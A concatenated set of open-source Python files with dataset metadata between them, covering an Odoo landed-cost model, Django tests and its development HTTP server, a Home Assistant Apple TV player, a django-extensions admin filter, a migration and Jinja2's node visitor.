raise osv.except_osv(_('Error!'), _('The selected picking does not contain any move that would be impacted by landed costs. Landed costs are only possible for products configured in real time valuation with real price costing method. Please make sure it is the case, or you selected the correct picking'))
return lines
_columns = {
'name': fields.char('Name', track_visibility='always', readonly=True, copy=False),
'date': fields.date('Date', required=True, states={'done': [('readonly', True)]}, track_visibility='onchange', copy=False),
'picking_ids': fields.many2many('stock.picking', string='Pickings', states={'done': [('readonly', True)]}, copy=False),
'cost_lines': fields.one2many('stock.landed.cost.lines', 'cost_id', 'Cost Lines', states={'done': [('readonly', True)]}, copy=True),
'valuation_adjustment_lines': fields.one2many('stock.valuation.adjustment.lines', 'cost_id', 'Valuation Adjustments', states={'done': [('readonly', True)]}),
'description': fields.text('Item Description', states={'done': [('readonly', True)]}),
'amount_total': fields.function(_total_amount, type='float', string='Total', digits_compute=dp.get_precision('Account'),
store={
'stock.landed.cost': (lambda self, cr, uid, ids, c={}: ids, ['cost_lines'], 20),
'stock.landed.cost.lines': (_get_cost_line, ['price_unit', 'quantity', 'cost_id'], 20),
}, track_visibility='always'
),
'state': fields.selection([('draft', 'Draft'), ('done', 'Posted'), ('cancel', 'Cancelled')], 'State', readonly=True, track_visibility='onchange', copy=False),
'account_move_id': fields.many2one('account.move', 'Journal Entry', readonly=True, copy=False),
'account_journal_id': fields.many2one('account.journal', 'Account Journal', required=True),
}
_defaults = {
'name': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'stock.landed.cost'),
'state': 'draft',
'date': fields.date.context_today,
}
def _create_accounting_entries(self, cr, uid, line, move_id, qty_out, context=None):
product_obj = self.pool.get('product.template')
cost_product = line.cost_line_id and line.cost_line_id.product_id
if not cost_product:
return False
accounts = product_obj.get_product_accounts(cr, uid, line.product_id.product_tmpl_id.id, context=context)
debit_account_id = accounts['property_stock_valuation_account_id']
already_out_account_id = accounts['stock_account_output']
credit_account_id = line.cost_line_id.account_id.id or cost_product.property_account_expense.id or cost_product.categ_id.property_account_expense_categ.id
if not credit_account_id:
raise osv.except_osv(_('Error!'), _('Please configure Stock Expense Account for product: %s.') % (cost_product.name))
return self._create_account_move_line(cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=context)
def _create_account_move_line(self, cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=None):
"""
Generate the account.move.line values to track the landed cost.
Afterwards, for the goods that are already out of stock, we should create the out moves
"""
aml_obj = self.pool.get('account.move.line')
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'debit': line.additional_landed_cost,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'credit': line.additional_landed_cost,
'account_id': credit_account_id
}, context=context)
#Create account move lines for quants already out of stock
if qty_out > 0:
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'credit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'debit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': already_out_account_id
}, context=context)
return True
def _create_account_move(self, cr, uid, cost, context=None):
vals = {
'journal_id': cost.account_journal_id.id,
'period_id': self.pool.get('account.period').find(cr, uid, cost.date, context=context)[0],
'date': cost.date,
'ref': cost.name
}
return self.pool.get('account.move').create(cr, uid, vals, context=context)
def _check_sum(self, cr, uid, landed_cost, context=None):
"""
Will check if each cost line its valuation lines sum to the correct amount
and if the overall total amount is correct also
"""
costcor = {}
tot = 0
for valuation_line in landed_cost.valuation_adjustment_lines:
if costcor.get(valuation_line.cost_line_id):
costcor[valuation_line.cost_line_id] += valuation_line.additional_landed_cost
else:
costcor[valuation_line.cost_line_id] = valuation_line.additional_landed_cost
tot += valuation_line.additional_landed_cost
res = (tot == landed_cost.amount_total)
for costl in costcor.keys():
if costcor[costl] != costl.price_unit:
res = False
return res
def button_validate(self, cr, uid, ids, context=None):
quant_obj = self.pool.get('stock.quant')
for cost in self.browse(cr, uid, ids, context=context):
if not cost.valuation_adjustment_lines or not self._check_sum(cr, uid, cost, context=context):
raise osv.except_osv(_('Error!'), _('You cannot validate a landed cost which has no valid valuation lines.'))
move_id = self._create_account_move(cr, uid, cost, context=context)
quant_dict = {}
for line in cost.valuation_adjustment_lines:
if not line.move_id:
continue
per_unit = line.final_cost / line.quantity
diff = per_unit - line.former_cost_per_unit
quants = [quant for quant in line.move_id.quant_ids]
for quant in quants:
if quant.id not in quant_dict:
quant_dict[quant.id] = quant.cost + diff
else:
quant_dict[quant.id] += diff
for key, value in quant_dict.items():
quant_obj.write(cr, uid, key, {'cost': value}, context=context)
qty_out = 0
for quant in line.move_id.quant_ids:
if quant.location_id.usage != 'internal':
qty_out += quant.qty
self._create_accounting_entries(cr, uid, line, move_id, qty_out, context=context)
self.write(cr, uid, cost.id, {'state': 'done', 'account_move_id': move_id}, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
return True
def compute_landed_cost(self, cr, uid, ids, context=None):
line_obj = self.pool.get('stock.valuation.adjustment.lines')
unlink_ids = line_obj.search(cr, uid, [('cost_id', 'in', ids)], context=context)
line_obj.unlink(cr, uid, unlink_ids, context=context)
towrite_dict = {}
for cost in self.browse(cr, uid, ids, context=None):
if not cost.picking_ids:
continue
picking_ids = [p.id for p in cost.picking_ids]
total_qty = 0.0
total_cost = 0.0
total_weight = 0.0
total_volume = 0.0
total_line = 0.0
vals = self.get_valuation_lines(cr, uid, [cost.id], picking_ids=picking_ids, context=context)
for v in vals:
for line in cost.cost_lines:
v.update({'cost_id': cost.id, 'cost_line_id': line.id})
self.pool.get('stock.valuation.adjustment.lines').create(cr, uid, v, context=context)
total_qty += v.get('quantity', 0.0)
total_cost += v.get('former_cost', 0.0)
total_weight += v.get('weight', 0.0)
total_volume += v.get('volume', 0.0)
total_line += 1
for line in cost.cost_lines:
for valuation in cost.valuation_adjustment_lines:
value = 0.0
if valuation.cost_line_id and valuation.cost_line_id.id == line.id:
if line.split_method == 'by_quantity' and total_qty:
per_unit = (line.price_unit / total_qty)
value = valuation.quantity * per_unit
elif line.split_method == 'by_weight' and total_weight:
per_unit = (line.price_unit / total_weight)
value = valuation.weight * per_unit
elif line.split_method == 'by_volume' and total_volume:
per_unit = (line.price_unit / total_volume)
value = valuation.volume * per_unit
elif line.split_method == 'equal':
value = (line.price_unit / total_line)
elif line.split_method == 'by_current_cost_price' and total_cost:
per_unit = (line.price_unit / total_cost)
value = valuation.former_cost * per_unit
else:
value = (line.price_unit / total_line)
if valuation.id not in towrite_dict:
towrite_dict[valuation.id] = value
else:
towrite_dict[valuation.id] += value
if towrite_dict:
for key, value in towrite_dict.items():
line_obj.write(cr, uid, key, {'additional_landed_cost': value}, context=context)
return True
class stock_landed_cost_lines(osv.osv):
_name = 'stock.landed.cost.lines'
_description = 'Stock Landed Cost Lines'
def onchange_product_id(self, cr, uid, ids, product_id=False, context=None):
result = {}
if not product_id:
return {'value': {'quantity': 0.0, 'price_unit': 0.0}}
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
result['name'] = product.name
result['split_method'] = product.split_method
result['price_unit'] = product.standard_price
result['account_id'] = product.property_account_expense and product.property_account_expense.id or product.categ_id.property_account_expense_categ.id
return {'value': result}
_columns = {
'name': fields.char('Description'),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'product_id': fields.many2one('product.product', 'Product', required=True),
'price_unit': fields.float('Cost', required=True, digits_compute=dp.get_precision('Product Price')),
'split_method': fields.selection(product.SPLIT_METHOD, string='Split Method', required=True),
'account_id': fields.many2one('account.account', 'Account', domain=[('type', '<>', 'view'), ('type', '<>', 'closed')]),
}
class stock_valuation_adjustment_lines(osv.osv):
_name = 'stock.valuation.adjustment.lines'
_description = 'Stock Valuation Adjustment Lines'
def _amount_final(self, cr, uid, ids, name, args, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
result[line.id] = {
'former_cost_per_unit': 0.0,
'final_cost': 0.0,
}
result[line.id]['former_cost_per_unit'] = (line.former_cost / line.quantity if line.quantity else 1.0)
result[line.id]['final_cost'] = (line.former_cost + line.additional_landed_cost)
return result
def _get_name(self, cr, uid, ids, name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.product_id.code or line.product_id.name or ''
if line.cost_line_id:
res[line.id] += ' - ' + line.cost_line_id.name
return res
_columns = {
'name': fields.function(_get_name, type='char', string='Description', store=True),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'cost_line_id': fields.many2one('stock.landed.cost.lines', 'Cost Line', readonly=True),
'move_id': fields.many2one('stock.move', 'Stock Move', readonly=True),
'product_id': fields.many2one('product.product', 'Product', required=True),
'quantity': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'weight': fields.float('Weight', digits_compute=dp.get_precision('Product Unit of Measure')),
'volume': fields.float('Volume', digits_compute=dp.get_precision('Product Unit of Measure')),
'former_cost': fields.float('Former Cost', digits_compute=dp.get_precision('Product Price')),
'former_cost_per_unit': fields.function(_amount_final, multi='cost', string='Former Cost(Per Unit)', type='float', digits_compute=dp.get_precision('Account'), store=True),
'additional_landed_cost': fields.float('Additional Landed Cost', digits_compute=dp.get_precision('Product Price')),
'final_cost': fields.function(_amount_final, multi='cost', string='Final Cost', type='float', digits_compute=dp.get_precision('Account'), store=True),
}
_defaults = {
'quantity': 1.0,
'weight': 1.0,
'volume': 1.0,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 630,939,832,108,810,600 | 52.22029 | 317 | 0.572137 | false |
jpshort/odoo | addons/l10n_at/__init__.py | 438 | 1050 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) conexus.at
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -3,500,147,947,048,035,300 | 42.75 | 79 | 0.612381 | false |
titasakgm/brc-stock | openerp/addons/sale_crm/report/__init__.py | 54 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sales_crm_account_invoice_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -4,010,211,136,674,821,600 | 42.48 | 78 | 0.619135 | false |
nathanial/lettuce | tests/integration/lib/Django-1.3/tests/modeltests/get_object_or_404/tests.py | 92 | 2623 | from django.http import Http404
from django.shortcuts import get_object_or_404, get_list_or_404
from django.test import TestCase
from models import Author, Article
class GetObjectOr404Tests(TestCase):
def test_get_object_or_404(self):
a1 = Author.objects.create(name="Brave Sir Robin")
a2 = Author.objects.create(name="Patsy")
# No Articles yet, so we should get a Http404 error.
self.assertRaises(Http404, get_object_or_404, Article, title="Foo")
article = Article.objects.create(title="Run away!")
article.authors = [a1, a2]
# get_object_or_404 can be passed a Model to query.
self.assertEqual(
get_object_or_404(Article, title__contains="Run"),
article
)
# We can also use the Article manager through an Author object.
self.assertEqual(
get_object_or_404(a1.article_set, title__contains="Run"),
article
)
# No articles containing "Camelot". This should raise a Http404 error.
self.assertRaises(Http404,
get_object_or_404, a1.article_set, title__contains="Camelot"
)
# Custom managers can be used too.
self.assertEqual(
get_object_or_404(Article.by_a_sir, title="Run away!"),
article
)
# QuerySets can be used too.
self.assertEqual(
get_object_or_404(Article.objects.all(), title__contains="Run"),
article
)
# Just as when using a get() lookup, you will get an error if more than
# one object is returned.
self.assertRaises(Author.MultipleObjectsReturned,
get_object_or_404, Author.objects.all()
)
# Using an EmptyQuerySet raises a Http404 error.
self.assertRaises(Http404,
get_object_or_404, Article.objects.none(), title__contains="Run"
)
# get_list_or_404 can be used to get lists of objects
self.assertEqual(
get_list_or_404(a1.article_set, title__icontains="Run"),
[article]
)
# Http404 is returned if the list is empty.
self.assertRaises(Http404,
get_list_or_404, a1.article_set, title__icontains="Shrubbery"
)
# Custom managers can be used too.
self.assertEqual(
get_list_or_404(Article.by_a_sir, title__icontains="Run"),
[article]
)
# QuerySets can be used too.
self.assertEqual(
get_list_or_404(Article.objects.all(), title__icontains="Run"),
[article]
)
| gpl-3.0 | 9,134,291,923,948,444,000 | 31.7875 | 79 | 0.59512 | false |
VishvajitP/django-extensions | django_extensions/admin/filter.py | 16 | 1997 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.admin import FieldListFilter
try:
from django.contrib.admin.utils import prepare_lookup_value
except ImportError:
# django < 1.7
from django.contrib.admin.util import prepare_lookup_value
from django.utils.translation import ugettext_lazy as _
class NullFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '{0}__isnull'.format(field_path)
super(NullFieldListFilter, self).__init__(field, request, params, model, model_admin, field_path)
lookup_choices = self.lookups(request, model_admin)
self.lookup_choices = () if lookup_choices is None else list(lookup_choices)
def expected_parameters(self):
return [self.lookup_kwarg]
def value(self):
return self.used_parameters.get(self.lookup_kwarg, None)
def lookups(self, request, model_admin):
return (
('1', _('Yes')),
('0', _('No')),
)
def choices(self, cl):
yield {
'selected': self.value() is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All'),
}
for lookup, title in self.lookup_choices:
yield {
'selected': self.value() == prepare_lookup_value(self.lookup_kwarg, lookup),
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup,
}, []),
'display': title,
}
def queryset(self, request, queryset):
if self.value() is not None:
kwargs = {self.lookup_kwarg: self.value()}
return queryset.filter(**kwargs)
return queryset
class NotNullFieldListFilter(NullFieldListFilter):
def lookups(self, request, model_admin):
return (
('0', _('Yes')),
('1', _('No')),
)
| mit | 5,439,272,784,419,594,000 | 32.847458 | 105 | 0.585879 | false |
Zac-HD/home-assistant | homeassistant/components/media_player/apple_tv.py | 3 | 9307 | """
Support for Apple TV.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.apple_tv/
"""
import asyncio
import logging
import hashlib
import aiohttp
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components.media_player import (
SUPPORT_NEXT_TRACK, SUPPORT_PAUSE, SUPPORT_PREVIOUS_TRACK, SUPPORT_SEEK,
SUPPORT_STOP, SUPPORT_PLAY, SUPPORT_PLAY_MEDIA, SUPPORT_TURN_ON,
SUPPORT_TURN_OFF, MediaPlayerDevice, PLATFORM_SCHEMA, MEDIA_TYPE_MUSIC,
MEDIA_TYPE_VIDEO, MEDIA_TYPE_TVSHOW)
from homeassistant.const import (
STATE_IDLE, STATE_PAUSED, STATE_PLAYING, STATE_STANDBY, CONF_HOST,
STATE_OFF, CONF_NAME)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyatv==0.1.4']
_LOGGER = logging.getLogger(__name__)
CONF_LOGIN_ID = 'login_id'
CONF_START_OFF = 'start_off'
DEFAULT_NAME = 'Apple TV'
DATA_APPLE_TV = 'apple_tv'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_LOGIN_ID): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_START_OFF, default=False): cv.boolean
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Setup the Apple TV platform."""
import pyatv
if discovery_info is not None:
name = discovery_info['name']
host = discovery_info['host']
login_id = discovery_info['hsgid']
start_off = False
else:
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
login_id = config.get(CONF_LOGIN_ID)
start_off = config.get(CONF_START_OFF)
if DATA_APPLE_TV not in hass.data:
hass.data[DATA_APPLE_TV] = []
if host in hass.data[DATA_APPLE_TV]:
return False
hass.data[DATA_APPLE_TV].append(host)
details = pyatv.AppleTVDevice(name, host, login_id)
session = async_get_clientsession(hass)
atv = pyatv.connect_to_apple_tv(details, hass.loop, session=session)
entity = AppleTvDevice(atv, name, start_off)
yield from async_add_entities([entity], update_before_add=True)
class AppleTvDevice(MediaPlayerDevice):
"""Representation of an Apple TV device."""
def __init__(self, atv, name, is_off):
"""Initialize the Apple TV device."""
self._atv = atv
self._name = name
self._is_off = is_off
self._playing = None
self._artwork_hash = None
@callback
def _set_power_off(self, is_off):
self._playing = None
self._artwork_hash = None
self._is_off = is_off
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
if self._is_off:
return STATE_OFF
if self._playing is not None:
from pyatv import const
state = self._playing.play_state
if state == const.PLAY_STATE_NO_MEDIA:
return STATE_IDLE
elif state == const.PLAY_STATE_PLAYING or \
state == const.PLAY_STATE_LOADING:
return STATE_PLAYING
elif state == const.PLAY_STATE_PAUSED or \
state == const.PLAY_STATE_FAST_FORWARD or \
state == const.PLAY_STATE_FAST_BACKWARD:
# Catch fast forward/backward here so "play" is default action
return STATE_PAUSED
else:
return STATE_STANDBY # Bad or unknown state?
@asyncio.coroutine
def async_update(self):
"""Retrieve latest state."""
if self._is_off:
return
from pyatv import exceptions
try:
playing = yield from self._atv.metadata.playing()
if self._has_playing_media_changed(playing):
base = str(playing.title) + str(playing.artist) + \
str(playing.album) + str(playing.total_time)
self._artwork_hash = hashlib.md5(
base.encode('utf-8')).hexdigest()
self._playing = playing
except exceptions.AuthenticationError as ex:
_LOGGER.warning('%s (bad login id?)', str(ex))
except aiohttp.errors.ClientOSError as ex:
_LOGGER.error('failed to connect to Apple TV (%s)', str(ex))
except asyncio.TimeoutError:
_LOGGER.warning('timed out while connecting to Apple TV')
def _has_playing_media_changed(self, new_playing):
if self._playing is None:
return True
old_playing = self._playing
return new_playing.media_type != old_playing.media_type or \
new_playing.title != old_playing.title
@property
def media_content_type(self):
"""Content type of current playing media."""
if self._playing is not None:
from pyatv import const
media_type = self._playing.media_type
if media_type == const.MEDIA_TYPE_VIDEO:
return MEDIA_TYPE_VIDEO
elif media_type == const.MEDIA_TYPE_MUSIC:
return MEDIA_TYPE_MUSIC
elif media_type == const.MEDIA_TYPE_TV:
return MEDIA_TYPE_TVSHOW
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
if self._playing is not None:
return self._playing.total_time
@property
def media_position(self):
"""Position of current playing media in seconds."""
if self._playing is not None:
return self._playing.position
@property
def media_position_updated_at(self):
"""Last valid time of media position."""
state = self.state
if state == STATE_PLAYING or state == STATE_PAUSED:
return dt_util.utcnow()
@asyncio.coroutine
def async_play_media(self, media_type, media_id, **kwargs):
"""Send the play_media command to the media player."""
yield from self._atv.remote_control.play_url(media_id, 0)
@property
def media_image_hash(self):
"""Hash value for media image."""
return self._artwork_hash
@asyncio.coroutine
def async_get_media_image(self):
"""Fetch media image of current playing image."""
return (yield from self._atv.metadata.artwork()), 'image/png'
@property
def media_title(self):
"""Title of current playing media."""
if self._playing is not None:
if self.state == STATE_IDLE:
return 'Nothing playing'
title = self._playing.title
return title if title else "No title"
@property
def supported_features(self):
"""Flag media player features that are supported."""
features = SUPPORT_TURN_ON | SUPPORT_TURN_OFF | SUPPORT_PLAY_MEDIA
if self._playing is None or self.state == STATE_IDLE:
return features
features |= SUPPORT_PAUSE | SUPPORT_PLAY | SUPPORT_SEEK | \
SUPPORT_STOP | SUPPORT_NEXT_TRACK | SUPPORT_PREVIOUS_TRACK
return features
@asyncio.coroutine
def async_turn_on(self):
"""Turn the media player on."""
self._set_power_off(False)
@asyncio.coroutine
def async_turn_off(self):
"""Turn the media player off."""
self._set_power_off(True)
def async_media_play_pause(self):
"""Pause media on media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
state = self.state
if state == STATE_PAUSED:
return self._atv.remote_control.play()
elif state == STATE_PLAYING:
return self._atv.remote_control.pause()
def async_media_play(self):
"""Play media.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.play()
def async_media_pause(self):
"""Pause the media player.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.pause()
def async_media_next_track(self):
"""Send next track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.next()
def async_media_previous_track(self):
"""Send previous track command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.previous()
def async_media_seek(self, position):
"""Send seek command.
This method must be run in the event loop and returns a coroutine.
"""
if self._playing is not None:
return self._atv.remote_control.set_position(position)
| apache-2.0 | -5,281,340,171,427,332,000 | 32.003546 | 78 | 0.611368 | false |
thrive-refugee/thrive-refugee | donors/migrations/0005_auto_20141108_1219.py | 1 | 1067 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('donors', '0004_auto_20141108_1110'),
]
operations = [
migrations.CreateModel(
name='Donation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('when', models.DateField(default=datetime.date.today)),
('amount', models.DecimalField(max_digits=11, decimal_places=2)),
('memo', models.CharField(max_length=256, blank=True)),
('donor', models.ForeignKey(to='donors.Donor')),
],
options={
},
bases=(models.Model,),
),
migrations.RemoveField(
model_name='donor',
name='last_amount',
),
migrations.RemoveField(
model_name='donor',
name='last_donation',
),
]
| mit | 4,993,764,627,107,552,000 | 28.638889 | 114 | 0.535145 | false |
davidvon/pipa-pay-server | site-packages/jinja2/visitor.py | 1401 | 3316 | # -*- coding: utf-8 -*-
"""
jinja2.visitor
~~~~~~~~~~~~~~
This module implements a visitor for the nodes.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD.
"""
from jinja2.nodes import Node
class NodeVisitor(object):
"""Walks the abstract syntax tree and call visitor functions for every
node found. The visitor functions may return values which will be
forwarded by the `visit` method.
Per default the visitor functions for the nodes are ``'visit_'`` +
class name of the node. So a `TryFinally` node visit function would
be `visit_TryFinally`. This behavior can be changed by overriding
the `get_visitor` function. If no visitor function exists for a node
(return value `None`) the `generic_visit` visitor is used instead.
"""
def get_visitor(self, node):
"""Return the visitor function for this node or `None` if no visitor
exists for this node. In that case the generic visit function is
used instead.
"""
method = 'visit_' + node.__class__.__name__
return getattr(self, method, None)
def visit(self, node, *args, **kwargs):
"""Visit a node."""
f = self.get_visitor(node)
if f is not None:
return f(node, *args, **kwargs)
return self.generic_visit(node, *args, **kwargs)
def generic_visit(self, node, *args, **kwargs):
"""Called if no explicit visitor function exists for a node."""
for node in node.iter_child_nodes():
self.visit(node, *args, **kwargs)
class NodeTransformer(NodeVisitor):
"""Walks the abstract syntax tree and allows modifications of nodes.
The `NodeTransformer` will walk the AST and use the return value of the
visitor functions to replace or remove the old node. If the return
value of the visitor function is `None` the node will be removed
from the previous location otherwise it's replaced with the return
value. The return value may be the original node in which case no
replacement takes place.
"""
def generic_visit(self, node, *args, **kwargs):
for field, old_value in node.iter_fields():
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, Node):
value = self.visit(value, *args, **kwargs)
if value is None:
continue
elif not isinstance(value, Node):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, Node):
new_node = self.visit(old_value, *args, **kwargs)
if new_node is None:
delattr(node, field)
else:
setattr(node, field, new_node)
return node
def visit_list(self, node, *args, **kwargs):
"""As transformers may return lists in some places this method
can be used to enforce a list as return value.
"""
rv = self.visit(node, *args, **kwargs)
if not isinstance(rv, list):
rv = [rv]
return rv
| apache-2.0 | 4,152,995,269,863,771,000 | 37.114943 | 76 | 0.584741 | false |
isaac-philip/loolu | common/django/core/servers/basehttp.py | 9 | 25759 | """
BaseHTTPServer that implements the Python WSGI protocol (PEP 333, rev 1.21).
Adapted from wsgiref.simple_server: http://svn.eby-sarna.com/wsgiref/
This is a simple server for use in testing or debugging Django apps. It hasn't
been reviewed for security issues. Don't use it for production use.
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import mimetypes
import os
import re
import stat
import sys
import urllib
from django.utils.http import http_date
from django.utils._os import safe_join
__version__ = "0.1"
__all__ = ['WSGIServer','WSGIRequestHandler']
server_version = "WSGIServer/" + __version__
sys_version = "Python/" + sys.version.split()[0]
software_version = server_version + ' ' + sys_version
class WSGIServerException(Exception):
pass
class FileWrapper(object):
"""Wrapper to convert file-like objects to iterables"""
def __init__(self, filelike, blksize=8192):
self.filelike = filelike
self.blksize = blksize
if hasattr(filelike,'close'):
self.close = filelike.close
def __getitem__(self,key):
data = self.filelike.read(self.blksize)
if data:
return data
raise IndexError
def __iter__(self):
return self
def next(self):
data = self.filelike.read(self.blksize)
if data:
return data
raise StopIteration
# Regular expression that matches `special' characters in parameters, the
# existence of which force quoting of the parameter value.
tspecials = re.compile(r'[ \(\)<>@,;:\\"/\[\]\?=]')
def _formatparam(param, value=None, quote=1):
"""Convenience function to format and return a key=value pair.
This will quote the value if needed or if quote is true.
"""
if value is not None and len(value) > 0:
if quote or tspecials.search(value):
value = value.replace('\\', '\\\\').replace('"', r'\"')
return '%s="%s"' % (param, value)
else:
return '%s=%s' % (param, value)
else:
return param
class Headers(object):
"""Manage a collection of HTTP response headers"""
def __init__(self,headers):
if not isinstance(headers, list):
raise TypeError("Headers must be a list of name/value tuples")
self._headers = headers
def __len__(self):
"""Return the total number of headers, including duplicates."""
return len(self._headers)
def __setitem__(self, name, val):
"""Set the value of a header."""
del self[name]
self._headers.append((name, val))
def __delitem__(self,name):
"""Delete all occurrences of a header, if present.
Does *not* raise an exception if the header is missing.
"""
name = name.lower()
self._headers[:] = [kv for kv in self._headers if kv[0].lower()<>name]
def __getitem__(self,name):
"""Get the first header value for 'name'
Return None if the header is missing instead of raising an exception.
Note that if the header appeared multiple times, the first exactly which
occurrance gets returned is undefined. Use getall() to get all
the values matching a header field name.
"""
return self.get(name)
def has_key(self, name):
"""Return true if the message contains the header."""
return self.get(name) is not None
__contains__ = has_key
def get_all(self, name):
"""Return a list of all the values for the named field.
These will be sorted in the order they appeared in the original header
list or were added to this instance, and may contain duplicates. Any
fields deleted and re-inserted are always appended to the header list.
If no fields exist with the given name, returns an empty list.
"""
name = name.lower()
return [kv[1] for kv in self._headers if kv[0].lower()==name]
def get(self,name,default=None):
"""Get the first header value for 'name', or return 'default'"""
name = name.lower()
for k,v in self._headers:
if k.lower()==name:
return v
return default
def keys(self):
"""Return a list of all the header field names.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [k for k, v in self._headers]
def values(self):
"""Return a list of all header values.
These will be sorted in the order they appeared in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return [v for k, v in self._headers]
def items(self):
"""Get all the header fields and values.
These will be sorted in the order they were in the original header
list, or were added to this instance, and may contain duplicates.
Any fields deleted and re-inserted are always appended to the header
list.
"""
return self._headers[:]
def __repr__(self):
return "Headers(%s)" % `self._headers`
def __str__(self):
"""str() returns the formatted headers, complete with end line,
suitable for direct HTTP transmission."""
return '\r\n'.join(["%s: %s" % kv for kv in self._headers]+['',''])
def setdefault(self,name,value):
"""Return first matching header value for 'name', or 'value'
If there is no header named 'name', add a new header with name 'name'
and value 'value'."""
result = self.get(name)
if result is None:
self._headers.append((name,value))
return value
else:
return result
def add_header(self, _name, _value, **_params):
"""Extended header setting.
_name is the header field to add. keyword arguments can be used to set
additional parameters for the header field, with underscores converted
to dashes. Normally the parameter will be added as key="value" unless
value is None, in which case only the key will be added.
Example:
h.add_header('content-disposition', 'attachment', filename='bud.gif')
Note that unlike the corresponding 'email.Message' method, this does
*not* handle '(charset, language, value)' tuples: all values must be
strings or None.
"""
parts = []
if _value is not None:
parts.append(_value)
for k, v in _params.items():
if v is None:
parts.append(k.replace('_', '-'))
else:
parts.append(_formatparam(k.replace('_', '-'), v))
self._headers.append((_name, "; ".join(parts)))
def guess_scheme(environ):
"""Return a guess for whether 'wsgi.url_scheme' should be 'http' or 'https'
"""
if environ.get("HTTPS") in ('yes','on','1'):
return 'https'
else:
return 'http'
_hop_headers = {
'connection':1, 'keep-alive':1, 'proxy-authenticate':1,
'proxy-authorization':1, 'te':1, 'trailers':1, 'transfer-encoding':1,
'upgrade':1
}
